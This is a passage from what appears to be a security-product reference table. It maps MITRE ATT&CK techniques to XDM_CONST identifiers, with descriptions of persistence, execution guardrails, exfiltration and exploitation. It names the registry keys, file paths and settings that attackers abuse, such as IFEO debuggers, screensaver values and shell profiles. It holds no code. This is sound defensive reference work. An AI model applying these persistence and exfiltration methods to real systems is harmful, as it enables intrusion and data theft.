AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Windows or HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows
NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll. In practice
this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection
July 2017) Similar to Process Injection, these values can be abused to obtain elevated privileges by
causing a malicious DLL to be loaded and run in the context of separate processes on the computer.
(Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being
triggered by API activity. The AppInit DLL functionality is disabled in Windows 8 and later versions when
secure boot is enabled. (Citation: AppInit Secure Boot) https://attack.mitre.org/techniques/T1546/010

T1546.011 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_APPLICATION_SHIMMING Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered
by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework
(Application Shim) was created to allow for backward compatibility of software as the operating system
codebase changes over time. For example, the application shimming feature allows developers to apply
fixes to applications (without rewriting code) that were created for Windows XP so that it will work with
Windows 10. (Citation: Elastic Process Injection July 2017) Within the framework, shims are created to act
as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS.
When a program is executed, the shim cache is referenced to determine if the program requires the use of
the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order
to communicate with the OS. A list of all shims currently installed by the default Windows installer
(sdbinst.exe) is kept in: * %WINDIR%\AppPatch\sysmain.sdb and * hklm\software\microsoft\windows
nt\currentversion\appcompatflags\installedsdb Custom databases are stored in: * %WINDIR%
\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom and *
hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom To keep shims
secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have
administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account
Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes
(InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling
(DisableSEH), and intercept memory addresses (GetProcAddress). Utilizing these shims may allow an
adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses
like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to
establish persistence by continuously being invoked by affected programs. https://attack.mitre.org/
techniques/T1546/011
Original Mapped Description

T1546.001 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_CHANGE_DEFAULT_FILE_ASSOCIATION Adversaries may establish persistence by executing malicious content triggered by a file type association.
When a file is opened, the default program used to open the file (also called the file association or handler)
is checked. File association selections are stored in the Windows Registry and can be edited by users,
administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs)
(Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft
Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary
program when a file with the given extension is opened. System file associations are listed under
HKEY_CLASSES_ROOT\.[extension], for example HKEY_CLASSES_ROOT\.txt. The entries point to a
handler for that extension located at HKEY_CLASSES_ROOT\[handler]. The various commands are then
listed as subkeys underneath the shell key at
HKEY_CLASSES_ROOT\[handler]\shell\[action]\command. For example: *
HKEY_CLASSES_ROOT\txtfile\shell\open\command *
HKEY_CLASSES_ROOT\txtfile\shell\print\command *
HKEY_CLASSES_ROOT\txtfile\shell\printto\command The values of the keys listed are commands that
are executed when the handler opens the file extension. Adversaries can modify these values to continually
execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012) https://attack.mitre.org/
techniques/T1546/001

T1546.015 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_COMPONENT_OBJECT_MODEL_HIJACKING Adversaries may establish persistence by executing malicious content triggered by hijacked references to
Component Object Model (COM) objects. COM is a system within Windows to enable interaction between
software components through the operating system.(Citation: Microsoft Component Object Model)
References to various COM objects are stored in the Registry. Adversaries can use the COM system to
insert malicious code that can be executed in place of legitimate software through hijacking the COM
references and relationships as a means for persistence. Hijacking a COM object requires a change in the
Registry to replace a reference to a legitimate system component which may cause that component to not
work when executed. When that system component is executed through normal system operation the
adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack
objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to
break noticeable functionality within the system as to avoid system instability that could lead to detection.
https://attack.mitre.org/techniques/T1546/015

T1546.014 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_EMOND Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the
Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/
T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes
action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory
and take action once an explicitly defined event takes place. The rule files are in the plist format and define
the name, event type, and action to take. Some examples of event types include system startup and user
authentication. Examples of actions are to run a system command or send an email. The emond service
will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients,
specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/
System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation:
magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may abuse this
service by writing a rule to execute commands when a defined event occurs, such as system start up or
user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation:
sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from
administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://
attack.mitre.org/techniques/T1543/004) service. https://attack.mitre.org/techniques/T1546/014

T1546.012 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_IMAGE_FILE_EXECUTION_OPTIONS_INJECTION Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered
by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an
application. When a process is created, a debugger present in an application’s IFEO will be prepended to
the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe
-g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) IFEOs can be set directly via the Registry
or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as
Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the
debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010) IFEOs can also enable an arbitrary
monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by
itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation:
Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags
and/or by directly modifying IFEO and silent process exit Registry values in
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\.
(Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to
[Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well
as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another
program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe).
After the Registry is modified, pressing the appropriate key combination at the login screen while at the
keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/
T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury
2014) Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be
abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context
of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO
mechanisms may also provide Persistence via continuous triggered invocation. Malware may also use
IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that
redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon)
(Citation: Symantec Ushedix June 2008) https://attack.mitre.org/techniques/T1546/012

T1546.006 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_LC_LOAD_DYLIB_ADDITION Adversaries may establish persistence by executing malicious content triggered by the execution of tainted
binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a
binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic
libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long
as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for
OSX) There are tools available to perform these changes. Adversaries may modify Mach-O binary headers
to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate
digital signatures on binaries because the binary is being modified, this can be remediated by simply
removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load
time. (Citation: Malware Persistence on OS X) https://attack.mitre.org/techniques/T1546/006

T1546.007 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_NETSH_HELPER_DLL Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs.
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network
configuration of a system. It contains functionality to add helper DLLs for extending functionality of the
utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the
Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh. Adversaries can use netsh.exe helper DLLs to
trigger execution of arbitrary code in a persistent manner. This execution would take place anytime
netsh.exe is executed, which could happen automatically, with another persistence technique, or if other
software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.
(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence) https://attack.mitre.org/
techniques/T1546/007

T1546.013 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_POWERSHELL_PROFILE Adversaries may gain persistence and elevate privileges by executing malicious content triggered by
PowerShell profiles. A PowerShell profile (profile.ps1) is a script that runs when [PowerShell](https://
attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user
environments. [PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles
depending on the user or host program. For example, there can be different profiles for [PowerShell](https://
attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console, PowerShell ISE or
Visual Studio Code. An administrator can also configure a profile that applies to all users and host
programs on the local computer. (Citation: Microsoft About Profiles) Adversaries may modify these profiles
to include arbitrary commands, functions, modules, and/or [PowerShell](https://attack.mitre.org/techniques/
T1059/001) drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/
techniques/T1059/001) session the modified script will be executed unless the -NoProfile flag is used
when it is launched. (Citation: ESET Turla PowerShell May 2019) An adversary may also be able to
escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher
privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles) https://
attack.mitre.org/techniques/T1546/013
Original Mapped Description

T1546.002 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_SCREENSAVER Adversaries may establish persistence by executing malicious content triggered by user inactivity.
Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable
Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver
application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit
Windows systems, along with screensavers included with base Windows installations. The following
screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be
manipulated to achieve persistence: * SCRNSAVE.exe - set to malicious PE path * ScreenSaveActive - set
to '1' to enable the screensaver * ScreenSaverIsSecure - set to '0' to not require a password to unlock *
ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed Adversaries can use
screensaver settings to maintain persistence by setting the screensaver to run malware after a certain
timeframe of user inactivity. (Citation: ESET Gazer Aug 2017) https://attack.mitre.org/techniques/T1546/002

T1546.005 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_TRAP Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The
trap command allows programs and shells to specify commands that will be executed upon receiving
interrupt signals. A common situation is a script allowing for graceful termination and handling of common
keyboard interrupts like ctrl+c and ctrl+d. Adversaries can use this to register code to be executed when
the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following
format trap 'command list' signals where "command list" will be executed when "signals" are
received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements) https://attack.mitre.org/techniques/
T1546/005

T1546.004 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_UNIX_SHELL_CONFIGURATION_MODIFICATION Adversaries may establish persistence through executing malicious commands triggered by a user’s shell.
User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at
different points throughout the session based on events. For example, when a user opens a command-line
interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from
the system (/etc) and the user’s home directory (~/) to configure the environment. All login shells on a
system use /etc/profile when initiated. These configuration scripts run at the permission level of their
directory and are often used to set environment variables, create aliases, and customize the user’s
environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell
exits appropriately. Adversaries may attempt to establish persistence by inserting commands into scripts
automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems,
adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/
profile.d files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require
root permissions to modify and are executed each time any shell on a system launches. For user level
permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or
~/.profile which are sourced when a user opens a command-line interface or connects remotely.
(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes
the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution.
Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is
established remotely or an additional interactive shell is opened, such as a new tab in the command-line
interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation:
Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the
~/.bash_logout file to execute malicious commands at the end of a session. For macOS, the functionality
of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the
Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login
shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/
zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)
(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with
~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment.
Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/
bashrc on startup. https://attack.mitre.org/techniques/T1546/004

T1546.003 XDM_CONST.MITRE_TECHNIQUE_MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a
Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters,
providers, consumers, and bindings that execute code when a defined event occurs. Examples of events
that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant
M-Trends 2015) Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary
code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015)
(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object
(MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI
Persistence) (Citation: Microsoft MOF May 2018) WMI subscription execution is proxied by the WMI
Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. https://
attack.mitre.org/techniques/T1546/003

T1480 XDM_CONST.MITRE_TECHNIQUE_EXECUTION_GUARDRAILS Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied
and environment specific conditions that are expected to be present on the target. Guardrails ensure that a
payload only executes against an intended target and reduces collateral damage from an adversary’s
campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target
system or environment to use as guardrails may include specific network share names, attached physical
devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye
Outlook Dec 2019) Guardrails can be used to prevent exposure of capabilities in environments that are not
intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/
Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion]
(https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing
with execution only if there is no match, the use of guardrails will involve checking for an expected target-
specific value and only continuing with execution if there is such a match. https://attack.mitre.org/
techniques/T1480

T1480.001 XDM_CONST.MITRE_TECHNIQUE_EXECUTION_GUARDRAILS_ENVIRONMENTAL_KEYING Adversaries may environmentally key payloads or other features of malware to evade defenses and
constraint execution to a specific target environment. Environmental keying uses cryptography to constrain
execution or actions based on adversary supplied environment specific conditions that are expected to be
present on the target. Environmental keying is an implementation of [Execution Guardrails](https://
attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption
keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents) Values
can be derived from target-specific elements and used to generate a decryption key for an encrypted
payload. Target-specific values can be derived from specific network shares, physical devices, software/
software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation:
Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware
Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the
decryption keys from target-specific environmental values, environmental keying can make sandbox
detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation:
Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the
incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use
environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to
deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before
execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation:
Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo)
By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption
key with the payload or sending it over a potentially monitored network connection. Depending on the
technique for gathering target-specific values, reverse engineering of the encrypted payload can be
exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of
capabilities in environments that are not intended to be compromised or operated within. Like other
[Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to
prevent exposure of capabilities in environments that are not intended to be compromised or operated
within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/
techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/
T1497) may involve checking for known sandbox values and continuing with execution only if there is no
match, the use of environmental keying will involve checking for an expected target-specific value that must
match for decryption and subsequent execution to be successful. https://attack.mitre.org/techniques/
T1480/001
Original Mapped Description

T1048 XDM_CONST.MITRE_TECHNIQUE_EXFILTRATION_OVER_ALTERNATIVE_PROTOCOL Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and
control channel. The data may also be sent to an alternate network location from the main command and
control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol
not being used as the main command and control channel. Different protocol channels could also include
Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate
channels. [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done
using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB
or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl may be used to invoke protocols
such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and
Techniques) https://attack.mitre.org/techniques/T1048

T1048.002 XDM_CONST.MITRE_TECHNIQUE_MITRE_TECHNIQUE_EXFILTRATION_OVER_ALTERNATIVE_PROTOCOL_EXFILTRATION_OVER_ASYMMETRIC_ENCRYPTED_NON_C2_PROTOCOL Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than
that of the existing command and control channel. The data may also be sent to an alternate network
location from the main command and control server. Asymmetric encryption algorithms are those that use
different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of
cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the
communication channels requires a private key (only in the procession of that entity) and the public key of
the other entity. The public keys of each entity are exchanged before encrypted communications begin.
Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric
encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are
baked into a protocol. https://attack.mitre.org/techniques/T1048/002

T1048.001 XDM_CONST.MITRE_TECHNIQUE_MITRE_TECHNIQUE_EXFILTRATION_OVER_ALTERNATIVE_PROTOCOL_EXFILTRATION_OVER_SYMMETRIC_ENCRYPTED_NON_C2_PROTOCOL Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that
of the existing command and control channel. The data may also be sent to an alternate network location
from the main command and control server. Symmetric encryption algorithms are those that use shared or
the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/
possession of the value used to encrypt and decrypt data. Network protocols that use asymmetric
encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to
manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using
mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that
are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as
HTTP or FTP). https://attack.mitre.org/techniques/T1048/001

T1048.003 XDM_CONST.MITRE_TECHNIQUE_MITRE_TECHNIQUE_EXFILTRATION_OVER_ALTERNATIVE_PROTOCOL_EXFILTRATION_OVER_UNENCRYPTED_OBFUSCATED_NON_C2_PROTOCOL Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the
existing command and control channel. The data may also be sent to an alternate network location from the
main command and control server. Adversaries may opt to obfuscate this data, without the use of
encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may
include custom or publicly available encoding/compression algorithms (such as base64) as well as
embedding data within protocol headers and fields. https://attack.mitre.org/techniques/T1048/003

T1041 XDM_CONST.MITRE_TECHNIQUE_EXFILTRATION_OVER_C2_CHANNEL Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is
encoded into the normal communications channel using the same protocol as command and control
communications. https://attack.mitre.org/techniques/T1041

T1011 XDM_CONST.MITRE_TECHNIQUE_EXFILTRATION_OVER_OTHER_NETWORK_MEDIUM Adversaries may attempt to exfiltrate data over a different network medium than the command and control
channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for
example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency
(RF) channel. Adversaries may choose to do this if they have sufficient access or proximity, and the
connection might not be secured or defended as well as the primary Internet-connected channel because it
is not routed through the same enterprise network https://attack.mitre.org/techniques/T1011

T1011.001 XDM_CONST.MITRE_TECHNIQUE_EXFILTRATION_OVER_OTHER_NETWORK_MEDIUM_EXFILTRATION_OVER_BLUETOOTH Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If
the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data
using a Bluetooth communication channel. Adversaries may choose to do this if they have sufficient access
and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-
connected channel because it is not routed through the same enterprise network. https://attack.mitre.org/
techniques/T1011/001

T1052 XDM_CONST.MITRE_TECHNIQUE_EXFILTRATION_OVER_PHYSICAL_MEDIUM Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain
circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium
or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone,
MP3 player, or other removable storage and processing device. The physical medium or device could be
used as the final exfiltration point or to hop between otherwise disconnected systems. https://
attack.mitre.org/techniques/T1052

T1052.001 XDM_CONST.MITRE_TECHNIQUE_EXFILTRATION_OVER_PHYSICAL_MEDIUM_EXFILTRATION_OVER_USB Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances,
such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user.
The USB device could be used as the final exfiltration point or to hop between otherwise disconnected
systems. https://attack.mitre.org/techniques/T1052/001

T1567 XDM_CONST.MITRE_TECHNIQUE_EXFILTRATION_OVER_WEB_SERVICE Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary
command and control channel. Popular Web services acting as an exfiltration mechanism may give a
significant amount of cover due to the likelihood that hosts within a network are already communicating with
them prior to compromise. Firewall rules may also already exist to permit traffic to these services. Web
service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.
https://attack.mitre.org/techniques/T1567

T1567.002 XDM_CONST.MITRE_TECHNIQUE_EXFILTRATION_OVER_WEB_SERVICE_EXFILTRATION_TO_CLOUD_STORAGE Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and
control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud
storage server over the Internet. Examples of cloud storage services include Dropbox and Google Docs.
Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if
hosts within the network are already communicating with the service. https://attack.mitre.org/techniques/
T1567/002

T1567.001 XDM_CONST.MITRE_TECHNIQUE_EXFILTRATION_OVER_WEB_SERVICE_EXFILTRATION_TO_CODE_REPOSITORY Adversaries may exfiltrate data to a code repository rather than over their primary command and control
channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these
APIs are often over HTTPS, which gives the adversary an additional level of protection. Exfiltration to a
code repository can also provide a significant amount of cover to the adversary if it is a popular service
already used by hosts within the network. https://attack.mitre.org/techniques/T1567/001

T1190 XDM_CONST.MITRE_TECHNIQUE_EXPLOIT_PUBLIC_FACING_APPLICATION Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using
software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the
system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can
include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS
Multiple SMB Vulnerabilities) or SSH), network device administration and management protocols (like
SNMP and Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation:
Cisco Blog Legacy Device Attacks)), and any other applications with Internet accessible open sockets, such
as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being
exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). If
an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to
compromise of the underlying instance or container. This can allow an adversary a path to access the cloud
or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/
T1611), or take advantage of weak identity and access management policies. For websites and databases,
the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation:
OWASP Top 10)(Citation: CWE top 25) https://attack.mitre.org/techniques/T1190
Original Mapped Description

T1203 XDM_CONST.MITRE_TECHNIQUE_EXPLOITATION_FOR_CLIENT_EXECUTION Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can
exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can
take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code
execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain
code execution on a remote system because they can be used to gain access to that system. Users will
expect to see files related to the applications they commonly used to do work, so they are a useful target for
exploit research and development because of their high utility. Several types exist: ### Browser-based
Exploitation Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/
techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint
systems may be compromised through normal web browsing or from certain users being targeted by links
in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not
require an action by the user for the exploit to be executed. ### Office Applications Common office and
productivity applications such as Microsoft Office are also targeted through [Phishing](https://
attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through
links to download them. These require the user to open the document or file for the exploit to run. ###
Common Third-party Applications Other applications that are commonly seen or are part of the software
deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and
Flash, which are common in enterprise environments, have been routinely targeted by adversaries
attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may
